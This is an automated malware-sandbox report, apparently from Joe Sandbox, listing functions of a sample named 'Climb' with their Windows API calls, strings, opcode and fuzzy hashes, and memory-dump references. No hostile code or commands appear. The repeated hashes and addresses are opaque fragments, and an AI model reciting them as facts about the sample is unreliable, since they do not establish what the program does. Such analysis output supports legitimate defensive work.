Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 29a2781c11dd8e4e451e22d4846f55062a6d23a3b0c6a3e232cf1ed3eee01466
Instruction ID: 1a2c52b9ed2156bdcecf6673c4a4df56038f898d1e1ab304a9010558e7137489
Opcode Fuzzy Hash: 29a2781c11dd8e4e451e22d4846f55062a6d23a3b0c6a3e232cf1ed3eee01466
Instruction Fuzzy Hash: E811D676900218BFC701EBE89C06FAE7FADEB45320F15825AF915E3290DB748D0587A0

Function 00A8D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00A8D369,00000000,00000004,00000000), ref: 00A8D588
GetLastError.KERNEL32 ref: 00A8D594
__dosmaperr.LIBCMT ref: 00A8D59B
ResumeThread.KERNEL32(00000000), ref: 00A8D5B9

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 06671db2dc35103be79b9caf39f4f948a571c4a7c7e878a0f1965d59d0317ca9
Instruction ID: 5f37d3704dbe744066c21bf554695962755218b47b9abe3d40fd9528f3e82b04
Opcode Fuzzy Hash: 06671db2dc35103be79b9caf39f4f948a571c4a7c7e878a0f1965d59d0317ca9
Instruction Fuzzy Hash: 6201F132400214BBDB25BFE5EC09FAE7B69EF81334F10032AF9258A1E0DB708901D7A1

Function 00A67873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A678B1
GetStockObject.GDI32(00000011), ref: 00A678C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A678CF

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 73d1216128b40e634bd0fcb9d1d6e9f38394e624ab7b0eb8a33ad3d7f131c52a
Instruction ID: e1e1b46bb886ddf6d4da058c1d9b670d286a8ea8912148f131e476816672907c
Opcode Fuzzy Hash: 73d1216128b40e634bd0fcb9d1d6e9f38394e624ab7b0eb8a33ad3d7f131c52a
Instruction Fuzzy Hash: 6F118B72505108BFDF129FD08C58EEEBB79FF09368F040115FA0056120D7319CA0EBA0

Function 00A933E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00A9338D,00000364,00000000,00000000,00000000,?,00A935FE,00000006,FlsSetValue), ref: 00A93418
GetLastError.KERNEL32(?,00A9338D,00000364,00000000,00000000,00000000,?,00A935FE,00000006,FlsSetValue,00B03260,FlsSetValue,00000000,00000364,?,00A931B9), ref: 00A93424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A9338D,00000364,00000000,00000000,00000000,?,00A935FE,00000006,FlsSetValue,00B03260,FlsSetValue,00000000), ref: 00A93432

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ec77e3636d6dfe8ffcc8b66e885a8d2bf8a3469bc06c84c0fcb30db7ef59948d
Instruction ID: 206f90ad79ccf44a4f0506b8df945d5ff20bd5e3a083f83afb98b39d7156a4e0
Opcode Fuzzy Hash: ec77e3636d6dfe8ffcc8b66e885a8d2bf8a3469bc06c84c0fcb30db7ef59948d
Instruction Fuzzy Hash: 4501AC37751222ABCF238BB99C449667BF9BF85BA27220620F906D7140DB20DD02C6E0

Function 00ACBA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00ACB69A,?,00008000), ref: 00ACBA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ACB69A,?,00008000), ref: 00ACBAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00ACB69A,?,00008000), ref: 00ACBABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ACB69A,?,00008000), ref: 00ACBAED

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 018799827acd64309c2446e9f4fe13325fb6c078a8eb27de1d331bd4e56f83a8
Instruction ID: ffa04d5088b99b9d87f354b7edcd855168fca58d9581e759f9b3eac55fc9fcc6
Opcode Fuzzy Hash: 018799827acd64309c2446e9f4fe13325fb6c078a8eb27de1d331bd4e56f83a8
Instruction Fuzzy Hash: 43118B30C10629EBCF00DFE9E94ABEEBB78BF09751F124199D981B2140CB318A51CBA5

Function 00AF886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AF888E
ScreenToClient.USER32(?,?), ref: 00AF88A6
ScreenToClient.USER32(?,?), ref: 00AF88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AF88E5

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: fc63f3285fa20092b5b6c1d0273d28104fe871faf80126d735999a2068d559ec
Instruction ID: eae6967e447bd5151cf1f68c6b6ad26b13c915f4b26eeddb55bef1fbd81de51a
Opcode Fuzzy Hash: fc63f3285fa20092b5b6c1d0273d28104fe871faf80126d735999a2068d559ec
Instruction Fuzzy Hash: 201140B9D00209AFDB41CFE8C884AEEBBB5FB08350F508166E915E3210D735AA55CF90

Function 00AC36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AC3712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC3723
GetCurrentThreadId.KERNEL32 ref: 00AC372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AC3731

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 526fd123344122f85311eccb61a23ee4a4121e48ff3103326a936d6942f97af5
Instruction ID: 8d0c65b6e1fd50c23baeab3c027fece26497345d619a795b3e153d24a387f868
Opcode Fuzzy Hash: 526fd123344122f85311eccb61a23ee4a4121e48ff3103326a936d6942f97af5
Instruction Fuzzy Hash: 70E092B2101224BBDB2197E29C4DFFBBF6DDF42BA1F014019F105E6080DAA5C941D2B0

Function 00AF92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A61F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A61F87
Part of subcall function 00A61F2D: SelectObject.GDI32(?,00000000), ref: 00A61F96
Part of subcall function 00A61F2D: BeginPath.GDI32(?), ref: 00A61FAD
Part of subcall function 00A61F2D: SelectObject.GDI32(?,00000000), ref: 00A61FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AF92E3
LineTo.GDI32(?,?,?), ref: 00AF92F0
EndPath.GDI32(?), ref: 00AF9300
StrokePath.GDI32(?), ref: 00AF930E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 0d7cf4d96b1cf260eaf7b9652853f1e3ad2f87aa6d550f61a72cb1be22a99d21
Instruction ID: 10220e2a1ed0f092eb8f70f104ccd56ab9703f7d4a1ee0acb499675a3c91e851
Opcode Fuzzy Hash: 0d7cf4d96b1cf260eaf7b9652853f1e3ad2f87aa6d550f61a72cb1be22a99d21
Instruction Fuzzy Hash: D8F05E31005259BADB139FD4AC0EFDE3F6AAF0A324F148201FA12250E1CB755562DBA9

Function 00A621A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A621BC
SetTextColor.GDI32(?,?), ref: 00A621C6
SetBkMode.GDI32(?,00000001), ref: 00A621D9
GetStockObject.GDI32(00000005), ref: 00A621E1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: a2c04028e331cf0610c909f78d7b69234410371ba9acdc9a6dda29bf2e0cedea
Instruction ID: 98e226dc630f8b2097fa2eaf44b3975b18df2ec3a9ae26600a9786aaebc0a117
Opcode Fuzzy Hash: a2c04028e331cf0610c909f78d7b69234410371ba9acdc9a6dda29bf2e0cedea
Instruction Fuzzy Hash: 67E06532240640AEDB229BF4AC097F97B62AB12336F14831AF7B6580E0C7724641DB10

Function 00ABEC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00ABEC36
GetDC.USER32(00000000), ref: 00ABEC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ABEC60
ReleaseDC.USER32(?), ref: 00ABEC81

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 6100c079f038cf534c7c8958ade2b591ef7a411aea7eec671057637fe0a4ff7e
Instruction ID: 3b84514d4fc1d696852239aa936b88531eb47c2a1845e1ff20e9038f12f3ba6f
Opcode Fuzzy Hash: 6100c079f038cf534c7c8958ade2b591ef7a411aea7eec671057637fe0a4ff7e
Instruction Fuzzy Hash: AEE012B4800204EFCB92EFE0C908AADBFB6EB08311F108449E80AE7251DB385902EF00

Function 00ABEC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00ABEC4A
GetDC.USER32(00000000), ref: 00ABEC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ABEC60
ReleaseDC.USER32(?), ref: 00ABEC81

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f57fb93e5871acf2f52851df4a9247134f75b112dc83a8811df50a9fb46f019d
Instruction ID: 96bf4263ec77508286d362d4db275a1c7cb6e5eba617f8965e8c8bc720076caa
Opcode Fuzzy Hash: f57fb93e5871acf2f52851df4a9247134f75b112dc83a8811df50a9fb46f019d
Instruction Fuzzy Hash: 48E012B4C00204EFCB92DFE0C908A6DBBB2EB08310B108449E80AE7250DB386902EF00

Function 00AD57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00AD5919

Strings

LPT, xrefs: 00AD5840
*, xrefs: 00AD5855

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: dbbac69e6c2d829e2c4e1e7ebd4b65837d640c80ef93ce6d0f6bfd9bcb3b37c0
Instruction ID: da539987e071c81185b1157f9563ed8e2b919cc52bac3418f58ad7ab4d4c83d9
Opcode Fuzzy Hash: dbbac69e6c2d829e2c4e1e7ebd4b65837d640c80ef93ce6d0f6bfd9bcb3b37c0
Instruction Fuzzy Hash: 85917B75E00614DFDB14DF64C494EAABBF1AF44314F18809AE84A9F362C731EE85CB90

Function 00A8E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00A8E67D

Strings

pow, xrefs: 00A8E655, 00A8E672

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 9088fc4322629f5eef5c88fb2f0d7cfd37b57ec567fa270f1e37272d5ef5d36d
Instruction ID: b715ca764e6be73b2ac741c8cfeccb0f8e697bec1adf2e0338acc219f9d5f635
Opcode Fuzzy Hash: 9088fc4322629f5eef5c88fb2f0d7cfd37b57ec567fa270f1e37272d5ef5d36d
Instruction Fuzzy Hash: AE515C71F09102D6CF15FB14DE0136A2BE4EB61B50F304E68F091822E9FF398D969B46

Function 00A7A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00A7A916

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: ee78cafb2f56771bcdb6fbdffa498bbcc52ae44a3a35d657c68374c4567fea2e
Instruction ID: 3b4c9a67eae507a1d663c33edd27a2eb4529f039d380e575ec4f64cb65fa3880
Opcode Fuzzy Hash: ee78cafb2f56771bcdb6fbdffa498bbcc52ae44a3a35d657c68374c4567fea2e
Instruction Fuzzy Hash: 52515135504246EFCB25DF28C840AFE7BB8EF65310F64C055E9919B282DB389C92CB61

Function 00A7F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A7F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00A7F6F4

Strings

@, xrefs: 00A7F6E8

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 231056b7b1d4fef2ae92d219d15b0c17eb7600b6cdc7316a5466dd889a96c4e3
Instruction ID: 028627362bddce6a42b7f61362b6dbbdfe4afe8cb066414efb0b32fb594eb07d
Opcode Fuzzy Hash: 231056b7b1d4fef2ae92d219d15b0c17eb7600b6cdc7316a5466dd889a96c4e3
Instruction Fuzzy Hash: 4D5145714087489BD320EF54DC86BABBBF8FB94300F81894DF199421A1EF308579CB66

Function 00AE61A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00AE623D
_wcslen.LIBCMT ref: 00AE6249

Strings

CALLARGARRAY, xrefs: 00AE6243, 00AE6248

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 0e77431a81d7d664c3c56be4ba88c7d1aa681fd501bef547983b02b3085e7a70
Instruction ID: b0f894ecebcb02dca4717aeb7837548cc87fbfa95b138ec628d9a1b38e8e23a3
Opcode Fuzzy Hash: 0e77431a81d7d664c3c56be4ba88c7d1aa681fd501bef547983b02b3085e7a70
Instruction Fuzzy Hash: 2141E171E00209DFCB00EFA9C9819FEBBB5FF683A4F104529E506A7251EB719D81CB90

Function 00ADDB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00ADDB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00ADDB7F

Strings

|, xrefs: 00ADDB50

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 3f1d6097a4b0bce0efb22621b61089d7cd948e08aa36fdb33be048ce1eae2736
Instruction ID: 0f2dc9cf544bc2ffab95419692119754602448bcf520f1725b6aa512a84a8241
Opcode Fuzzy Hash: 3f1d6097a4b0bce0efb22621b61089d7cd948e08aa36fdb33be048ce1eae2736
Instruction Fuzzy Hash: 86315C71811109ABCF15EFB0CD85AEEBFB9FF04344F10002AF815A6262EB759A16CB60

Function 00AF4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00AF40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AF40F8

Strings

static, xrefs: 00AF4058

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 7ca4a4634d012ddad7333e191c9e3d9a19d8e89a101f8c4eaae8cbbd5050624b
Instruction ID: 7ccb1ea53cfb374157061ea21ab6bbaf9debdd1e57e55e6969b20213aacb722c
Opcode Fuzzy Hash: 7ca4a4634d012ddad7333e191c9e3d9a19d8e89a101f8c4eaae8cbbd5050624b
Instruction Fuzzy Hash: AA319E71110608AADB20DFB8CC80EFB73B9FF48724F008619FAA587190DA75AC81DB60

Function 00AF4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00AF50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF50D2

Strings

', xrefs: 00AF502C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
